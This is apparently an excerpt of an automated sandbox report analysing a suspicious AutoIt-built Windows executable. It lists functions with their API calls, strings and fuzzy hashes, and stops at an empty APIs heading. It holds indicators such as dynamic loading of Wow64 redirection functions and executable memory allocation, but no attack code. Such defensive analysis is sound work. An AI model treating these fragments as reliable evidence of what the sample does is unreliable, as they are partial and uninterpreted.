Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 40a6797a7598173bc70a09201a2491d10e063e55a2ccfcb4930357c2c13b6c1d
Instruction ID: 81e6044a54116970f5cace0a481cfdd1389833767a914843ca311a6bf77e4b13
Opcode Fuzzy Hash: 40a6797a7598173bc70a09201a2491d10e063e55a2ccfcb4930357c2c13b6c1d
Instruction Fuzzy Hash: 25415E7690121CBFDB10DFA5CC81AEEBBB8EF49300F004199FA55B7191DA716E49CBA0

Function 00F17946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F1F910,00000000,?,?,?,?), ref: 00F179DF
GetWindowLongW.USER32 ref: 00F179FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F17A0C

Strings

SysTreeView32, xrefs: 00F179B1

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 4ee03c11ab2d64b3b2b4f9374fa0e660fef3d47559b4c401d83230b6a09976fc
Instruction ID: a010427eb5e756b4a338820f8948ac1298c4bb611e4f64bf3005a4cc820bb262
Opcode Fuzzy Hash: 4ee03c11ab2d64b3b2b4f9374fa0e660fef3d47559b4c401d83230b6a09976fc
Instruction Fuzzy Hash: C431D03160420AABDF119E38CC41BEB77A9EF09334F244725F979A21E0D734ED95AB50

Function 00F173D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F17461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F17475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00F17499

Strings

SysMonthCal32, xrefs: 00F1742C

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 44226d1ed37f099c363f71d70bc9656c379c2780f6243cb6902a92582bd297e8
Instruction ID: 2852b530b0b2a8dae45934f6c3f82d1382792287da17e324245072ed792aa20e
Opcode Fuzzy Hash: 44226d1ed37f099c363f71d70bc9656c379c2780f6243cb6902a92582bd297e8
Instruction Fuzzy Hash: 8F21A332504219ABDF11DF54CC46FEA3BB9EF48724F110114FE196B1D0DA75AC95EBA0

Function 00F17B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F17C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F17C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F17C5F

Strings

msctls_updown32, xrefs: 00F17BC4

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: e2eef23b4b81b211cbaf920703ff286ff9675effb214478c3e5ec45e0f07cc62
Instruction ID: 9cfb2bb63366271ea621fdd7aa716c9ba14cef34261bdfd8866a2ecb9b567410
Opcode Fuzzy Hash: e2eef23b4b81b211cbaf920703ff286ff9675effb214478c3e5ec45e0f07cc62
Instruction Fuzzy Hash: 88217CB1604208AFDB10EF28DCC1DA737ECEB493A4B144059FA059B3A1CB31EC41AAA0

Function 00F16CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F16D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F16D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F16D70

Strings

Listbox, xrefs: 00F16D08

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 89ef7e529795ea6ae30a035b0df0884f29e1cb64f93f8d8cfdf2f4b95093452d
Instruction ID: 18f9a459df217b2c524f87d46a2639da8d040a6b77a4d58fe0f7c22c89a865cb
Opcode Fuzzy Hash: 89ef7e529795ea6ae30a035b0df0884f29e1cb64f93f8d8cfdf2f4b95093452d
Instruction Fuzzy Hash: 7121A432A10118BFDF158F54DC45FFB3BBAEF89764F018128F9459B1A0CA719C91ABA0

Function 00F1770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F17772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F17787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F17794

Strings

msctls_trackbar32, xrefs: 00F17749

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 97a96bf344cf4c2f78b3f235a607357a79bdf60b377985ab49977a47fcf300be
Instruction ID: 6f2b037bf89a1cb0287d223bc6f5add8354f11501fbc38b4b475b05ef22aaebe
Opcode Fuzzy Hash: 97a96bf344cf4c2f78b3f235a607357a79bdf60b377985ab49977a47fcf300be
Instruction Fuzzy Hash: 30112732604309BAEF106F61CC01FD737B9EF88B64F014118FA45A20D0C671E851EB10

Function 00E94C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E94B83,?), ref: 00E94C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E94C56

Strings

Wow64RevertWow64FsRedirection, xrefs: 00E94C50
kernel32.dll, xrefs: 00E94C3F

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 884ba71654071c74cced5d04ce0ad77170e1c585567ffe8963a772a9369f5fb0
Instruction ID: 5c72a40d2ed698ac60c21fed44b4cb97935c201b18cbfb015c5964453c633329
Opcode Fuzzy Hash: 884ba71654071c74cced5d04ce0ad77170e1c585567ffe8963a772a9369f5fb0
Instruction Fuzzy Hash: B5D02E70904B13DFEB209F31D808A8AB7E4AF01348B12C83ED896E62A0E770C8C0DA10

Function 00E94C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E94BD0,?,00E94DEF,?,00F552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E94C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E94C23

Strings

Wow64DisableWow64FsRedirection, xrefs: 00E94C1D
kernel32.dll, xrefs: 00E94C0C

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 858fe72dd0c14ce28f089f7a97b0b0080de2055063cb489650d4f1c17818e9f5
Instruction ID: 301a040dd3a648de0dbf539aa8fab1dc8d004c26df1bc7810187c90cbc24a0bf
Opcode Fuzzy Hash: 858fe72dd0c14ce28f089f7a97b0b0080de2055063cb489650d4f1c17818e9f5
Instruction Fuzzy Hash: 72D0C270500713DFDB20AF70D818646BAD5EF0834AB01CC3A9485E2190E6B4C480DA11

Function 00F10DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00F11039), ref: 00F10DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F10E07

Strings

RegDeleteKeyExW, xrefs: 00F10E01
advapi32.dll, xrefs: 00F10DF0

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 9a547754ebfa9d817eaafb095a0ef76b9ab0a6943c5e9b166097bfcdeede3912
Instruction ID: 2a6f95620e8ce841075a7548310dfeb2628dd182f156d26ae5b7f1e152d27d4e
Opcode Fuzzy Hash: 9a547754ebfa9d817eaafb095a0ef76b9ab0a6943c5e9b166097bfcdeede3912
Instruction Fuzzy Hash: C9D01270A10716DFD7205F75C8086C77AD5AF04351F15CC3EA885D2150DAF0D4D0E751

Function 00F090E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00F08CF4,?,00F1F910), ref: 00F090EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F09100

Strings

GetModuleHandleExW, xrefs: 00F090FA
kernel32.dll, xrefs: 00F090E9

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 53d202834b4fd5a9806c33f9fd9c9d97bcd909861b5295b31bb35b6b82824df8
Instruction ID: 318ef358daa68735fe0edef282e70cec3a521f7b7f30c7a99726d0717722eece
Opcode Fuzzy Hash: 53d202834b4fd5a9806c33f9fd9c9d97bcd909861b5295b31bb35b6b82824df8
Instruction Fuzzy Hash: B5D01734A18713DFDB209F31DC1868676E4AF453A5B12C83A9886E6591FAB4C884FA91

Function 00ED1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00ED1718
__swprintf.LIBCMT ref: 00ED1749

Strings

%.3d, xrefs: 00ED1723
WIN_XPe, xrefs: 00ED1788

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 6d1ee789a58e5842271e46f726d0f0cf446587cf07b941270b085850cd0a34d6
Instruction ID: fbfeaa182825818e299204eaf5c9f99a135b5a80ecea47e48f48e694efa31023
Opcode Fuzzy Hash: 6d1ee789a58e5842271e46f726d0f0cf446587cf07b941270b085850cd0a34d6
Instruction Fuzzy Hash: 3DD05B7190820CFACB04DBD09C89CFA777CE70A301F102593F802F2161E271DB56EA21

Function 00EE717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 761ac7e4d2c7bd9941cdb7ec5da5fe28730e0aff9ef311b011faefc94126d4ce
Instruction ID: f6ab1ff5aa90d63bfec963fd873dbffb87363558c15ce1f047c9d4b63a819325
Opcode Fuzzy Hash: 761ac7e4d2c7bd9941cdb7ec5da5fe28730e0aff9ef311b011faefc94126d4ce
Instruction Fuzzy Hash: 3FC1A074A0425AEFCB14CFA5C884EAEBBB5FF48304B109598E895EB251D730ED81DB90

Function 00F0E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00F0E0BE
CharLowerBuffW.USER32(?,?), ref: 00F0E101

Part of subcall function 00F0D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F0D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F0E301
_memmove.LIBCMT ref: 00F0E314

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: c82a2647a1231c402afeb8655bc9d7397163002336c0f448af156d869c105e2c
Instruction ID: cc96aa8df78ec854c14c1151620a4b98efecf9652ef8fe601f5608a50a11d73b
Opcode Fuzzy Hash: c82a2647a1231c402afeb8655bc9d7397163002336c0f448af156d869c105e2c
Instruction Fuzzy Hash: B7C12971A083019FC714DF28C481A6ABBE4FF89724F14896EF8999B391D731E945DF81

Function 00F08093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00F080C3
CoUninitialize.OLE32 ref: 00F080CE

Part of subcall function 00EED56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00EED5D4

VariantInit.OLEAUT32(?), ref: 00F080D9
VariantClear.OLEAUT32(?), ref: 00F083AA

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: c01a9ae776ca99414fa25290370b5691c486f424c322d5be4896203e305a121c
Instruction ID: 3caa2931e5e9cf11b827ae19b2f5d2628d1dbab85f294435abd124415cad40dd
Opcode Fuzzy Hash: c01a9ae776ca99414fa25290370b5691c486f424c322d5be4896203e305a121c
Instruction Fuzzy Hash: 32A17C356047019FCB14DF18C881B2AB7E4BF89364F14445CF996AB3A2DB30ED05EB82

Function 00EE7530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F22C7C,?), ref: 00EE76EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F22C7C,?), ref: 00EE7702
CLSIDFromProgID.OLE32(?,?,00000000,00F1FB80,000000FF,?,00000000,00000800,00000000,?,00F22C7C,?), ref: 00EE7727
_memcmp.LIBCMT ref: 00EE7748

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: dd5c11782578e5de847ab99230a24ec85e3d41c49843450b84e793873d46a2e1
Instruction ID: 729c0c1109d6228d9cc82ade57ce80c76ac6953364bd14cebb1fd2c96a881e56
Opcode Fuzzy Hash: dd5c11782578e5de847ab99230a24ec85e3d41c49843450b84e793873d46a2e1
Instruction Fuzzy Hash: 44812B75A0010AEFCB04DFA4C984EEEB7B9FF89315F204559E545BB250DB71AE06CB60

Function 00EE687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00EE688E
SysAllocString.OLEAUT32(00000000), ref: 00EE6937
VariantCopy.OLEAUT32 ref: 00EE6966
VariantClear.OLEAUT32(?), ref: 00EE698D

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 6653dad2cb81b812fe57d59668f52ce4578fde15547dcc9adbf276ad65f580b0
Instruction ID: d51dbfe83672340bd6d4b34ddace01bbef193bf5c479a1107fc4a1879e0b4c9e
Opcode Fuzzy Hash: 6653dad2cb81b812fe57d59668f52ce4578fde15547dcc9adbf276ad65f580b0
Instruction Fuzzy Hash: 4651E834B003499ADF24EF66D89167AB7E49F64350F20F82FE58AF7292EA30D8408705

Function 00F197F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0180EA88,?), ref: 00F19863
ScreenToClient.USER32(00000002,00000002), ref: 00F19896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00F19903

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: e9e6e05050aa35db2ca8829e05c719e06320849d108c1584b9ab5220b594e8e2
Instruction ID: a9bb31d89f5e57c7161848f41be9e3f7e75f5eb6ec52f385c75815f64f439184
Opcode Fuzzy Hash: e9e6e05050aa35db2ca8829e05c719e06320849d108c1584b9ab5220b594e8e2
Instruction Fuzzy Hash: 79514C34A04209AFCF14CF24C890AEE7BB5FF45370F548169F9659B2A0D770AD81EB90

Function 00EE9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00EE9AD2
__itow.LIBCMT ref: 00EE9B03

Part of subcall function 00EE9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00EE9DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00EE9B6C
__itow.LIBCMT ref: 00EE9BC3

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: c3a8f0d71c385d3ca780c5fda1b9af8589d4b639d4de63d4b2dc76aeab0bc3cc
Instruction ID: 47485e6b73919d2851741ff50b5d19f9e0c19d4cc64786477c4ac3360009dbad
Opcode Fuzzy Hash: c3a8f0d71c385d3ca780c5fda1b9af8589d4b639d4de63d4b2dc76aeab0bc3cc
Instruction Fuzzy Hash: BB416D70A0024CABDF25EF65D846BEE7BE9EF48714F001069F945B6292DB709A48CB61

Function 00F069AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

